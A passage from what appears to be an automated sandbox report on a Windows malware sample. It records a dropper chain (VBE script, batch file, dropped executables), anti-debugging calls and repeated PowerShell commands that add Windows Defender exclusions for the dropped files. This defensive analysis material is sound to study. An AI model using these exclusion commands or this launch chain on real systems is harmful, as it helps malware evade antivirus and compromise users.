GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3563942137.0000000013489000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]S
Source: w32tm.exe, 00000017.00000002.2372674605.000002B9FED37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

API call chain: ExitProcess graph end node

graph_0-25069

Source: C:\SavesHost\Blockbrowser.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_007EF838

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007F7DEE mov eax, dword ptr fs:[00000030h]

0_2_007F7DEE

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007FC030 GetProcessHeap,

0_2_007FC030

Source: C:\SavesHost\Blockbrowser.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_007EF838
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007EF9D5 SetUnhandledExceptionFilter,	0_2_007EF9D5
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_007EFBCA
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_007F8EBD

Source: C:\SavesHost\Blockbrowser.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\SavesHost\Blockbrowser.exe "C:\SavesHost/Blockbrowser.exe"	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe"

Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007EF654 cpuid

0_2_007EF654

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_007EAF0F

Source: C:\SavesHost\Blockbrowser.exe	Queries volume information: C:\SavesHost\Blockbrowser.exe VolumeInformation	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
